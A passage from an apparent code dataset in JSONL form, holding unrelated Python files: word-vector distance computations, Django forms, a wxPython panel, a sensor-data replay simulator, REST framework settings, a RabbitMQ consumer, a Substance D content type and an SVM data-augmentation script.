True)\n\nprint(student1.name)\nprint(student2.gpa)\n","sub_path":"ClassesAndObjects.py","file_name":"ClassesAndObjects.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"82468729","text":"import gensim\nimport pickle\nimport csv\nimport sys\nimport gzip\nimport logging\nimport numpy\nfrom numpy import linalg\nfrom scipy.spatial import distance\nfrom gensim.models import KeyedVectors\n\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n\ndef headToHead(word1,word2):\n newVec = []\n for i in range(0,len(word1)):\n newVec.append(word2[i]-word1[i])\n return newVec\n\n\nnostop = True\ninFile = sys.argv[2]\nif nostop:\n word_vectors_25 = KeyedVectors.load(\"vecs_25_nostop.kv\", mmap='r')\n word_vectors_30 = KeyedVectors.load(\"vecs_30_nostop.kv\", mmap='r')\n word_vectors_35 = KeyedVectors.load(\"vecs_35_nostop.kv\", mmap='r')\n word_vectors_40 = KeyedVectors.load(\"vecs_40_nostop.kv\", mmap='r')\n word_vectors_45 = KeyedVectors.load(\"vecs_45_nostop.kv\", mmap='r')\n word_vectors_50 = KeyedVectors.load(\"vecs_50_nostop.kv\", mmap='r')\n word_vectors_55 = KeyedVectors.load(\"vecs_55_nostop.kv\", mmap='r')\n word_vectors_60 = KeyedVectors.load(\"vecs_60_nostop.kv\", mmap='r')\n word_vectors_65 = KeyedVectors.load(\"vecs_65_nostop.kv\", mmap='r')\n word_vectors_70 = KeyedVectors.load(\"vecs_70_nostop.kv\", mmap='r')\n word_vectors_75 = KeyedVectors.load(\"vecs_75_nostop.kv\", mmap='r')\n \nvectorDictionary = {\"vecs_25_\":word_vectors_25, \"vecs_30_\":word_vectors_30,\"vecs_35_\":word_vectors_35,\n \"vecs_40_\":word_vectors_40, \"vecs_45_\":word_vectors_45,\"vecs_50_\":word_vectors_50,\n \"vecs_55_\":word_vectors_55, \"vecs_60_\":word_vectors_60,\"vecs_65_\":word_vectors_65,\n \"vecs_70_\":word_vectors_70, \"vecs_75_\":word_vectors_75}\n\ndistanceFunctionDictionary = {\"bray_curtis_\":distance.braycurtis,\"canberra_\":distance.canberra,\"chebyshev_\":distance.chebyshev,\n \"city_block_\":distance.cityblock, \"correlation_\":distance.correlation, \"cosine_\":distance.cosine,\n \"euclidian_\":distance.euclidean, \"mahalanobis_\":distance.mahalanobis,\"minowski_\":distance.minkowski,\n \"sqeuclidian_\":distance.sqeuclidean,\"head_to_head_\":headToHead,\"gensim_cosine_\":KeyedVectors.similarity}\n\nprint(\"Vectors Loaded\")\n\ndocuments = pickle.load(open(inFile,'rb'))\nfirstVector = False\nfor string, vector in vectorDictionary.items():\n word_vectors = vector\n fileDictionary = {}\n for functionName, function in distanceFunctionDictionary.items():\n fileArray = []\n absArray =[]\n vectorArray = []\n normArray = []\n if 
functionName == \"mahalanobis_\":\n while len(vectorArray) <= 1000:\n for i in range(0,len(documents[file])-1):\n if documents[file][i] in word_vectors.vocab and documents[file][i+1] in word_vectors.vocab:\n vector1 = word_vectors[documents[file][i]] \n if numpy.any(vectorArray != vector1):\n vectorArray.append(vector1)\n vector2 = word_vectors[documents[file][i+1]] \n if numpy.any(vectorArray != vector2):\n vectorArray.append(vector2)\n stacked = numpy.array(vectorArray).T\n iv = numpy.cov(stacked) \n for file in range(0,9999):\n for i in range(0,len(documents[file])-1):\n if documents[file][i] in word_vectors.vocab and documents[file][i+1] in word_vectors.vocab:\n vector1 = word_vectors[documents[file][i]] \n vector2 = word_vectors[documents[file][i+1]]\n fileArray.append(function(vector1,vector2,iv))\n elif functionName == \"gensim_cosine_\":\n for file in range(0,9999): \n for i in range(0,len(documents[file])-1):\n if documents[file][i] in word_vectors.vocab and documents[file][i+1] in word_vectors.vocab:\n fileArray.append((word_vectors.similarity(documents[file][i],documents[file][i+1])))\n absArray.append(abs(word_vectors.similarity(documents[file][i],documents[file][i+1]))) \n else:\n for file in range(0,9999): \n for i in range(0,len(documents[file])-1):\n if documents[file][i] in word_vectors.vocab and documents[file][i+1] in word_vectors.vocab:\n vector1 = word_vectors[documents[file][i]] \n vector2 = word_vectors[documents[file][i+1]] \n if functionName == \"head_to_head_\":\n if not firstVector:\n fileArray.append(word_vectors[documents[file][i]])\n firstVector == True\n vectorBetween = function(vector1,vector2)\n normArray.append(linalg.norm(vectorBetween))\n vectorArray.append(vectorBetween)\n else:\n fileArray.append(function(vector1,vector2))\n absArray.sort() \n fileArray.sort()\n if functionName == \"head_to_head_\":\n with open(functionName+'norm_'+string+\".txt\",\"w\") as f:\n for item in normArray:\n f.write(\"%s\\n\" % item)\n f.close()\n else:\n if functionName == \"gensim_cosine_\":\n with open(functionName+'abs_'+string+\".txt\",\"w\") as f:\n for item in absArray:\n f.write(\"%s\\n\" % item)\n f.close()\n with open(functionName+string+\".txt\",\"w\") as f:\n for item in fileArray:\n f.write(\"%s\\n\" % item)\n f.close()\n","sub_path":"files_input_data/NoNeed/distance_vector.py","file_name":"distance_vector.py","file_ext":"py","file_size_in_byte":5755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"356488952","text":"from django import forms\n\nfrom .models import Group, Student\n\n\nclass GroupForm(forms.ModelForm):\n class Meta:\n model = Group\n fields = ['name']\n widgets = {\n 'name': forms.TextInput(\n attrs={\n 'class': 'form-control',\n 'placeholder': 'Group name'\n }\n ),\n }\n\n\nclass GroupUpdateForm(forms.ModelForm):\n unregistered_students = forms.ModelMultipleChoiceField(\n queryset=Student.objects.filter(group_id=None),\n required=False\n )\n\n class Meta:\n model = Group\n fields = ['name', 'headman', 'unregistered_students']\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['headman'].queryset = self.instance.student_set.all()\n\n def save(self, *args, **kwargs):\n updated_group = super().save(*args, **kwargs)\n if self.cleaned_data['unregistered_students'].exists():\n for student in self.cleaned_data['unregistered_students']:\n student.group_id = updated_group\n student.save()\n return updated_group\n\n\nclass StudentForm(forms.ModelForm):\n class 
Meta:\n model = Student\n fields = [\n 'id',\n 'first_name',\n 'last_name',\n 'middle_name',\n 'birth_d',\n 'group_id'\n ]\n widgets = {\n 'birth_d': forms.DateInput(attrs={'placeholder': 'YYYY-MM-DD'}),\n # 'group_id': forms.Select\n }\n\n\nclass StudentUpdateForm(forms.ModelForm):\n class Meta:\n model = Student\n fields = '__all__'\n","sub_path":"students/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"182519147","text":"\"\"\" OptionsPanel.py\r\n\r\n The OptionsPanel accepts the following information:\r\n\r\n isPrebooked\r\n readyAt\r\n deliverBy\r\n roundTrip -- can be disabled if desired.\r\n suppressDataMessage\r\n\"\"\"\r\nimport string\r\nimport wx\r\n#import wx.calendar\r\n\r\nInputPanel = Framework.get(\"shared.Editor\").InputPanel\r\nBooleanInputField = Framework.get(\"shared.Editor\").BooleanInputField\r\nDateTimeInputField = Framework.get(\"shared.Editor\").DateTimeInputField\r\nDateSelector = Framework.get(\"shared.Editor\").DateSelector\r\nDatePickerCtrl = Framework.get(\"shared.Editor\").DatePickerCtrl\r\nPopupInputField = Framework.get(\"shared.Editor\").PopupInputField\r\n\r\n#############################################################################\r\n\r\nclass OptionsPanel(InputPanel):\r\n \"\"\" The \"Options\" input panel.\r\n \"\"\"\r\n def __init__(self, parent, editor, showRoundTripField=False):\r\n \"\"\" Standard initialiser.\r\n\r\n 'editor' is the InputEditor this panel belongs to. If\r\n 'showRoundTripField' is set to False, the \"round trip\" checkbox is\r\n shown; this allows us to hide this field if it is not wanted.\r\n \"\"\"\r\n InputPanel.__init__(self, parent)\r\n self._editor = editor\r\n self._showRoundTripField = showRoundTripField\r\n\r\n # Define our input fields.\r\n\r\n self._prebookedField = BooleanInputField(self, \"Prebooked Job\")\r\n self._readyAtField = DateTimeInputField(self)\r\n self._deliverByField = DateTimeInputField(self)\r\n\r\n if showRoundTripField:\r\n self._roundTripField = BooleanInputField(self, \"Round Trip Job\")\r\n else:\r\n # Keep track of this value internally.\r\n self._roundTrip = False\r\n\r\n #self._suppressDataMessageField = \\\r\n # BooleanInputField(self, \"Suppress Data Message\")\r\n\r\n self._okToLeaveField = \\\r\n BooleanInputField(self, \"OK To Leave\")\r\n self._requiresPopField = \\\r\n BooleanInputField(self, \"Requires POP\")\r\n self._requiresPodField = \\\r\n BooleanInputField(self, \"Requires POD\")\r\n self._requiresPodWithCallBackField = \\\r\n BooleanInputField(self, \"Requires POD with Call Back\")\r\n\r\n # Lay out the contents of the input panel.\r\n\r\n self.addField(None, self._prebookedField, \"isPrebooked\")\r\n #self.addField(\"Ready At\", self._readyAtField, \"timeEntered\")\r\n self.addField(\"Ready At\", self._readyAtField, \"readyAt\")\r\n self.addField(\"Deliver By\", self._deliverByField, \"deliverBy\")\r\n\r\n self.addVerticalGap(10)\r\n\r\n self.addField(None, self._okToLeaveField, \"okToLeave\")\r\n self.addField(None, self._requiresPopField, \"requiresPop\")\r\n self.addField(None, self._requiresPodField, \"requiresPod\")\r\n self.addField(None, self._requiresPodWithCallBackField,\r\n\t\t\t \"requiresPodWithCallBack\")\r\n\r\n self.addVerticalGap(10)\r\n\r\n if showRoundTripField:\r\n self.addField(None, self._roundTripField, \"roundTrip\")\r\n\r\n #self.addField(None, self._suppressDataMessageField,\r\n # \"suppressDataMessage\")\r\n 
self.layout()\r\n\r\n\r\n def recordToPanel(self, rec):\r\n \"\"\" Override InputPanel.recordToPanel().\r\n\r\n If we are not showing the \"round trip\" field, we keep track of this\r\n value internally.\r\n \"\"\"\r\n InputPanel.recordToPanel(self, rec)\r\n if not self._showRoundTripField:\r\n self._roundTrip = rec.get(\"roundTrip\", False)\r\n\r\n\r\n def panelToRecord(self, rec):\r\n \"\"\" Override InputPanel.panelToRecord().\r\n\r\n If we are not showing the \"round trip\" field, we keep track of this\r\n value internally.\r\n \"\"\"\r\n InputPanel.panelToRecord(self, rec)\r\n if not self._showRoundTripField:\r\n rec['roundTrip'] = self._roundTrip\r\n\r\n\r\n def setFieldValue(self, field, value):\r\n \"\"\" Override InputPanel.setFieldValue().\r\n\r\n If we are not showing the \"round trip\" field, we keep track of this\r\n value internally.\r\n \"\"\"\r\n if not self._showRoundTripField and field == \"roundTrip\":\r\n self._roundTrip = value\r\n else:\r\n InputPanel.setFieldValue(self, field, value)\r\n\r\n","sub_path":"shared/Editor/jobInputPanels/OptionsPanel.py","file_name":"OptionsPanel.py","file_ext":"py","file_size_in_byte":4348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"112292710","text":"import numpy as np\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\n\n\n# x is the positioning of the diagram\n# y is the energies of each orbital in a diagram\nx = np.array([1.00, 1.00, 1.00, 1.00, 1.00])\ny = np.array([0.90, 0.80, 0.75, 0.72, 0.60])\n\n# since we want horizonal lines, we'll have x-axis errorbars\nwidth = 0.2\nxerr = np.ones(len(x)) * width\n\nfig, ax = plt.subplots()\nax.errorbar(x, y, xerr=xerr, fmt='none', capsize=0, ecolor='black', barsabove=True)\nax.set_xbound(lower=0, upper=2)\nfig.savefig('diagram.pdf', bbox_inches='tight')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"301768076","text":"def longestIncreasingSubsequence(nums):\n n=len(nums)\n dp=[1 for i in range (len(nums))]\n for left in range(1,n):\n for current in range(left):\n if nums[left]>nums[current]:\n dp[left]=max(dp[left],dp[current]+1)\n maxvalue=-1\n for i in range(0,len(dp)):\n if dp[i]>maxvalue:\n maxvalue=dp[i]\n return maxvalue\n\n\nnums=[10,9,2,5,3,7,101,18]\nprint(longestIncreasingSubsequence(nums))","sub_path":"leetcodePractice/mediumProblems/longestIncreaingSubsequence.py","file_name":"longestIncreaingSubsequence.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"524944799","text":"# uncompyle6 version 3.5.0\r\n# Python bytecode 3.6 (3379)\r\n# Decompiled from: Python 3.6.8 (tags/v3.6.8:3c6b436a57, Dec 24 2018, 00:16:47) [MSC v.1916 64 bit (AMD64)]\r\n# Embedded file name: D:\\Projects\\d3ner\\ner\\process.py\r\n# Compiled at: 2018-06-19 19:17:05\r\n# Size of source mod 2**32: 549 bytes\r\nfrom ner import opt\r\n\r\ndef process(documents, config):\r\n \"\"\"\r\n Perform NER and NEN\r\n :param list documents: list of Document objects\r\n :param dict config: keys are ('ner' and 'nen') or 'ner_nen'\r\n :return: dict: {\"id\": }\r\n \"\"\"\r\n assert config.__class__.__name__ == 'dict', '\"config\" must be a dict.'\r\n res = {}\r\n ner_method = config.get(opt.NER_KEY)\r\n if ner_method:\r\n for d in documents:\r\n entities = ner_method.process(d)\r\n res[d.id] = 
entities\r\n\r\n    return res","sub_path":"ner/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"394248100","text":"import pandas as pd\nfrom datastreams.datastreams import Datastreams\nfrom datamodels.wristband import *\nfrom datamodels.skeletal import *\nfrom datamodels.eye_tracking import *\n\n\nclass FileDatastreams(Datastreams):\n\n    \"\"\"\n    This class is a subclass of Datastreams, and takes the data stored in the csv-files and simulates the datastreams as if they were streamed in real-time by the devices.\n    It does this by using an event loop, and scheduling data extraction at the appropriate time intervals (in the frequency of the data).\n    The data that is extracted will be stored in the current_data variables as can be seen below.\n    This data can be cleared, and is supposed to be cleared after it has been used to calculate the MMD Variables and sent to the dashboard (so it is cleared every half a second right now).\n    \"\"\"\n\n    # Arrays that hold all the currently generated data before it is cleared by the main loop\n    current_acc_data = []\n    current_bvp_data = []\n    current_eda_data = []\n    current_hr_data = []\n    current_ibi_data = []\n    current_temp_data = []\n    current_eye_tracking_data = []\n    current_skeleton_data = []\n\n    # The actual data sources (i.e. the csv files)\n    acc = None\n    bvp = None\n    eda = None\n    hr = None\n    ibi = None\n    temp = None\n    eye_tracking = None\n    skeleton = None\n\n    terminated = False\n    loop = None\n\n    file_path = \"./dataset\"\n\n    def __init__(self, studentID, loop):\n        \"\"\"\n        studentID is needed for reading the appropriate files. For example \"S001\".\n        \"\"\"\n        self.acc = pd.read_csv(\n            self.file_path + \"/empatica/\" + studentID + \"/ACC.csv\"\n        )\n        self.bvp = pd.read_csv(\n            self.file_path + \"/empatica/\" + studentID + \"/BVP.csv\"\n        )\n        self.eda = pd.read_csv(\n            self.file_path + \"/empatica/\" + studentID + \"/EDA.csv\"\n        )\n        self.hr = pd.read_csv(\n            self.file_path + \"/empatica/\" + studentID + \"/HR.csv\"\n        )\n        self.ibi = pd.read_csv(\n            self.file_path + \"/empatica/\" + studentID + \"/IBI.csv\"\n        )\n        self.temp = pd.read_csv(\n            self.file_path + \"/empatica/\" + studentID + \"/TEMP.csv\"\n        )\n        self.eye_tracking = pd.read_csv(\n            self.file_path + \"/eye-tracking/ET-data-\" + studentID + \".csv\"\n        )\n        self.skeleton = pd.read_csv(\n            self.file_path + \"/skeleton/skeleton-\" + studentID + \".csv\"\n        )\n        self.loop = loop\n\n    def generate_frequency_datastream(self, data, time, current_data, loop):\n        \"\"\"\n        This method populates a list with data from the dataset at a constant frequency.\n        It will call itself in a loop based on the frequency.\n        \"\"\"\n        if self.terminated:\n            return\n        freq = data.loc[0][0]\n        current_data.append(data.loc[time])\n        loop.call_later(\n            1 / freq, self.generate_frequency_datastream, data, time + 1, current_data, loop\n        )\n\n    def generate_eye_tracking_datastream(self, data, row, current_data, loop):\n        \"\"\"\n        This method populates a list with data from the eye_tracking dataset.\n        It will call itself in a loop based on the end_times of the fixations.\n        \"\"\"\n        if self.terminated:\n            return\n        data_row = data.loc[row]\n        end_time = data_row[2]\n        next_end_time = data.loc[row + 1][2]\n        current_data.append(data_row)\n        loop.call_later(\n            (next_end_time - end_time) /\n            1000, self.generate_eye_tracking_datastream, data, row + 1, current_data, loop\n        )\n\n    def generate_skeleton_datastream(self, data, row, current_data, loop):\n        \"\"\"\n        This method populates a list with data from the skeleton dataset.\n        It will call itself in a loop based on the timestamps of the dataset.\n        \"\"\"\n        if self.terminated:\n            return\n        row_counter = row\n        time = data.loc[row][4]\n        init_time = time\n        while True:\n            data_row = data.loc[row_counter]\n            time = data_row[4]\n            if time != init_time:\n                break\n            current_data.append(data_row)\n            row_counter += 1\n        loop.call_later(\n            time - init_time, self.generate_skeleton_datastream, data, row_counter, current_data, loop\n        )\n\n    def start(self):\n        \"\"\"\n        Start all the generate-methods, which means that they will start generating data in a loop.\n        \"\"\" \n        self.loop.call_soon(\n            self.generate_eye_tracking_datastream, self.eye_tracking, 1, self.current_eye_tracking_data, self.loop\n        )\n        self.loop.call_soon(\n            self.generate_skeleton_datastream, self.skeleton, 1, self.current_skeleton_data, self.loop\n        )\n        self.loop.call_soon(\n            self.generate_frequency_datastream, self.acc, 1, self.current_acc_data, self.loop\n        )\n        self.loop.call_soon(\n            self.generate_frequency_datastream, self.bvp, 1, self.current_bvp_data, self.loop\n        )\n        self.loop.call_soon(\n            self.generate_frequency_datastream, self.eda, 1, self.current_eda_data, self.loop\n        )\n        self.loop.call_soon(\n            self.generate_frequency_datastream, self.hr, 1, self.current_hr_data, self.loop\n        )\n        self.loop.call_soon(\n            self.generate_frequency_datastream, self.temp, 1, self.current_temp_data, self.loop\n        )\n\n    def terminate(self):\n        \"\"\"\n        Clear all the data and stop all the loops by setting terminated = True\n        \"\"\"\n        self.clear_current_data()\n        self.terminated = True\n\n    def clear_current_data(self):\n        \"\"\"\n        Clears all the current_data lists\n        \"\"\"\n        self.current_acc_data.clear()\n        self.current_bvp_data.clear()\n        self.current_eda_data.clear()\n        self.current_hr_data.clear()\n        self.current_ibi_data.clear()\n        self.current_temp_data.clear()\n        self.current_eye_tracking_data.clear()\n        self.current_skeleton_data.clear()\n\n    # ----------------------------------------------------------------------\n    # The following methods are getters so that we get the data as data classes we have made, not the raw data rows.\n    # See the Datastreams-superclass for more info\n\n    def get_current_acc_data(self):\n        return list(map(lambda row: AccDataPoint(row), self.current_acc_data))\n\n    def get_current_bvp_data(self):\n        return list(map(lambda row: BVPDataPoint(row), self.current_bvp_data))\n\n    def get_current_eda_data(self):\n        return list(map(lambda row: EDADataPoint(row), self.current_eda_data))\n\n    def get_current_hr_data(self):\n        return list(map(lambda row: HRDataPoint(row), self.current_hr_data))\n\n    def get_current_ibi_data(self):\n        return list(map(lambda row: IBIDataPoint(row), self.current_ibi_data))\n\n    def get_current_temp_data(self):\n        return list(map(lambda row: TempDataPoint(row), self.current_temp_data))\n\n    def get_current_eye_tracking_data(self):\n        return list(map(lambda row: EyeTrackingDataPoint(row), self.current_eye_tracking_data))\n\n    def get_current_skeleton_data(self):\n        return SkeletalNodeCollection(self.current_skeleton_data)\n\n    def get_current_au_data(self):\n        return []\n","sub_path":"backend/datastreams/file_datastreams.py","file_name":"file_datastreams.py","file_ext":"py","file_size_in_byte":7310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"447825883","text":"import datetime\n\nfrom rest_framework.pagination import PageNumberPagination\n\nANONYMOUS_USER_ID = 
-1\n\nCORS_ORIGIN_ALLOW_ALL = True\n\n# REST FRAMEWORK ~ http://www.django-rest-framework.org/\n# ---------------------------------------------------------------------------------------------------------------------\nREST_FRAMEWORK = {\n 'DEFAULT_PERMISSION_CLASSES': (\n 'rest_framework.permissions.IsAuthenticated',\n ),\n 'DEFAULT_AUTHENTICATION_CLASSES': (\n 'rest_framework.authentication.TokenAuthentication',\n 'rest_framework.authentication.SessionAuthentication',\n 'rest_framework.authentication.BasicAuthentication',\n ),\n 'EXCEPTION_HANDLER': 'config.exceptions.custom_exception_handler',\n\n 'DEFAULT_THROTTLE_CLASSES': (\n 'config.throttling.UserHourRateThrottle',\n ),\n 'DEFAULT_THROTTLE_RATES': {\n 'second_anon': '1/second',\n 'hour_anon': '30/hour',\n 'day_anon': '500/day',\n 'second_free': '3/second',\n 'hour_free': '200/hour',\n 'day_free': '2000/day',\n }\n}\n\nfrom rest_framework.settings import reload_api_settings\nreload_api_settings(setting='REST_FRAMEWORK', value=REST_FRAMEWORK)\n","sub_path":"src/config/plugins/rest_framework.py","file_name":"rest_framework.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"28184028","text":"import sys\nimport time\n\nimport pika\n\n\ndef simple_callback(ch, method, properties, body):\n print(\" [x] Received %r\" % body)\n time.sleep(body.count(b'.'))\n print(\" [x] Done\")\n ch.basic_ack(delivery_tag=method.delivery_tag)\n\n\ndef modify_callback(ch, method, properties, body):\n print(\" [x] Received %r\" % body)\n ch.queue_declare(queue='listen')\n time.sleep(body.count(b'.'))\n message = body + b' was modified'\n ch.basic_publish(exchange='',\n routing_key='listen',\n body=message)\n print(\" [x] Done\")\n ch.basic_ack(delivery_tag=method.delivery_tag)\n\n\ndef receive(ch, callback):\n channel.queue_declare(queue='hello', durable=True, arguments={\"x-max-length\": 5, \"x-overflow\": \"drop-head\"})\n ch.basic_consume(callback,\n queue='hello')\n print(' [*] Waiting for messages. 
To exit press CTRL+C')\n channel.start_consuming()\n\n\nconnection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))\nchannel = connection.channel()\n\nflag = sys.argv[1]\n\nif flag == 'receive':\n receive(channel, simple_callback)\n\nif flag == 'receive_n_modify':\n receive(channel, modify_callback)\n\n\n\n\n\n\n\n","sub_path":"rabbitmq/p2p_receive.py","file_name":"p2p_receive.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"205025981","text":"\"\"\"Resource definition for the analysis content type\n\"\"\"\n\nimport urllib\nimport colander\nimport deform.widget\n\nfrom persistent import Persistent\n\nfrom pyramid.httpexceptions import HTTPFound\n\nfrom substanced.content import content\nfrom substanced.folder import FolderKeyError\n\nfrom substanced.property import PropertySheet\nfrom substanced.schema import Schema\n\nfrom substanced.util import renamer\n\nfrom substanced.sdi import mgmt_view\nfrom substanced.form import FormView\nfrom substanced.interfaces import IFolder\n\nfrom ..analysis.cache import AnalysisCache\nfrom ..constants import AnalysisTypes\n\ndef short_name(title):\n \"\"\"Given a title, return a url-friendly name\n \"\"\"\n return urllib.quote(title.strip().lower().replace(u' ', u'-'))\n\n@colander.deferred\ndef name_validator(node, kw):\n \"\"\"Validate that the short name doesn't exist in the parent already.\n \"\"\"\n request = kw['request']\n context = request.context\n\n # Add or edit form?\n if request.registry.content.typeof(context) == 'Analysis':\n parent = context.__parent__\n instance = context\n else:\n parent = context\n instance = None\n\n def namecheck(node, value):\n try:\n new_name = short_name(value)\n\n # Only check if we are creating new content or actually changing the name\n if instance is None or instance.__name__ != new_name:\n parent.check_name(new_name)\n except FolderKeyError:\n raise colander.Invalid(node, \"Another analysis already exists with this name\", value)\n except Exception as e:\n raise colander.Invalid(node, e.args[0], value)\n\n return colander.All(\n colander.Length(1),\n namecheck,\n )\n\nclass AnalysisParameter(colander.Schema):\n key = colander.SchemaNode(colander.String())\n value = colander.SchemaNode(colander.String())\n\nclass AnalysisParameters(colander.SequenceSchema):\n parameter = AnalysisParameter()\n\nclass AnalysisSchema(Schema):\n\n title = colander.SchemaNode(\n colander.String(),\n validator=name_validator\n )\n\n description = colander.SchemaNode(\n colander.String(),\n missing=None,\n widget=deform.widget.TextAreaWidget(rows=5)\n )\n\n type = colander.SchemaNode(\n colander.String(),\n validator=colander.OneOf(AnalysisTypes.values()),\n widget=deform.widget.SelectWidget(values=AnalysisTypes.items())\n )\n\n refresh_interval = colander.SchemaNode(\n colander.Int(),\n description=\"Number of minutes to cache JIRA query results for.\",\n validator=colander.Range(min=0)\n )\n\n query = colander.SchemaNode(\n colander.String(),\n missing=None,\n description=\"JQL query specifying the data to include in the analysis.\"\n )\n\n parameters = AnalysisParameters(\n missing=None,\n description=\"Analysis-specific parameters.\"\n )\n\nclass AnalysisPropertySheet(PropertySheet):\n schema = AnalysisSchema()\n\n@content('Analysis',\n icon='glyphicon glyphicon-list-alt',\n add_view=lambda context, request: 'add_analysis' if request.registry.content.istype(context, 'JIRA Instance') else None,\n 
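# the lambda above exposes the 'add_analysis' view only inside a JIRA Instance container\n         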
propertysheets=(('Basic', AnalysisPropertySheet),),\n    after_create='after_create',\n)\nclass Analysis(Persistent):\n    \"\"\"An analysis created for a particular JIRA instance\n    \"\"\"\n\n    name = renamer()\n\n    def __init__(self, title='', description='', type='', refresh_interval=0, query='', parameters=None):\n        super(Analysis, self).__init__()\n\n        if parameters is None:\n            parameters = {}\n\n        self.title = title\n        self.description = description\n        self.type = type\n        self.refresh_interval = refresh_interval\n        self.query = query\n        self.parameters = parameters\n\n    @property\n    def title(self):\n        return self._title\n    @title.setter\n    def title(self, value):\n        self._title = value\n\n        name = self.analysis_name\n        if name:\n            self.name = name\n\n    @property\n    def analysis_name(self):\n        return short_name(self.title)\n\n    def after_create(self, inst, registry):\n        self.cache = AnalysisCache(inst.refresh_interval)\n\n@mgmt_view(\n    context=IFolder,\n    name='add_analysis',\n    tab_title='Add Analysis',\n    permission='sdi.add-content',\n    renderer='substanced.sdi:templates/form.pt',\n    tab_condition=False,\n)\nclass AddAnalysisInstanceView(FormView):\n    title = 'Add Analysis'\n    schema = AnalysisSchema()\n    buttons = ('add',)\n\n    def add_success(self, appstruct):\n        registry = self.request.registry\n        instance = registry.content.create('Analysis', **appstruct)\n        self.context[instance.analysis_name] = instance\n\n        return HTTPFound(\n            self.request.sdiapi.mgmt_path(self.context, '@@contents')\n        )\n","sub_path":"jiraflow/resources/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":4822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"283277242","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Nov 20 12:47:58 2019\r\n\r\n@author: yorksywang\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Nov 20 09:35:00 2019\r\n\r\n@author: yorksywang\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Oct 16 11:43:47 2019\r\n\r\n@author: yorksywang\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Oct 8 11:27:42 2019\r\n\r\n@author: yorksywang\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Sep 12 14:52:52 2019\r\n\r\n@author: yorksywang\r\n\"\"\"\r\n\r\nimport sklearn.svm as svm \r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport torch\r\nfrom functools import reduce\r\nimport torch.optim as optim\r\nimport torch.nn as nn\r\nfrom torch.nn import utils\r\nfrom torch.nn import init\r\n#from sklearn.datasets.samples_generator import make_blobs\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import StandardScaler\r\n#from model import LinearSVM\r\nimport pandas as pd\r\nUSE_CUDA = torch.cuda.is_available()\r\ndevice = torch.device(\"cuda\" if USE_CUDA else \"cpu\")\r\nimport random\r\nimport torch.nn.functional as F\r\nimport argparse\r\n\r\nglobal_input_size=256\r\n\r\n\r\ndef same_class_augmentation(x_to_aug,y_to_aug):\r\n    \"\"\" Perform same-class augmentation by additively blending each sample\r\n    with the mean of a few randomly chosen samples from the same set.\r\n    \"\"\"\r\n    #sig_paths = glob.glob(os.path.join(class_dir, \"*.wav\"))\r\n    #aug_sig_path = np.random.choice(sig_paths, 1, replace=False)[0]\r\n    #(fs, aug_sig) = utils.read_wave_file(aug_sig_path)\r\n    #print(np.shape(x_to_aug))\r\n    output_x=x_to_aug\r\n    output_y=np.concatenate((y_to_aug,y_to_aug),axis=0)\r\n    for i in range(np.shape(x_to_aug)[0]):\r\n        
x_temp1 =np.mean(random.choices(x_to_aug,k=5),0)\r\n alpha = np.random.rand()\r\n to_add=(1.0-alpha)*x_to_aug[i,:] + alpha*x_temp1\r\n #print(np.shape(to_add))\r\n output_x=np.concatenate( (output_x,to_add.reshape(1,global_input_size)),axis=0)\r\n #print(np.shape(output_x))\r\n return output_x,output_y\r\n\r\n\r\ndef get_data(test_size=0.2):\r\n #file_name=['word_list_gamble_20190927','training_data_weg','training_data_gam','training_data_bag']\r\n # i=0\r\n #df_train=pd.read_csv('./data/'+file_name[i]+'.csv',encoding='utf-8',header=1)\r\n df_train=pd.read_csv('../nlp/training_data_20191119.csv',encoding='utf-8',header=0,index_col=0)\r\n df_word=pd.read_csv('../nlp/training_data_20191119_word2vec_dict.csv',encoding='utf-8',header=0,index_col=0)\r\n \r\n x_train=np.array(df_train.values[:,0:global_input_size]).astype('float64') \r\n y_train=np.array(df_train.values[:,global_input_size]).astype('int')\r\n z_train=np.array(df_word.values[:]).astype('str')\r\n\r\n y=y_train[np.where(y_train>=0)]\r\n x=x_train[np.where(y_train>=0)]\r\n #X_train,X_test,Y_train,Y_test=train_test_split(x,y,test_size=0.15,random_state=20170816)\r\n\r\n y_temp=y_train[np.where(y_train>=1)]\r\n x_temp=x_train[np.where(y_train>=1)]\r\n 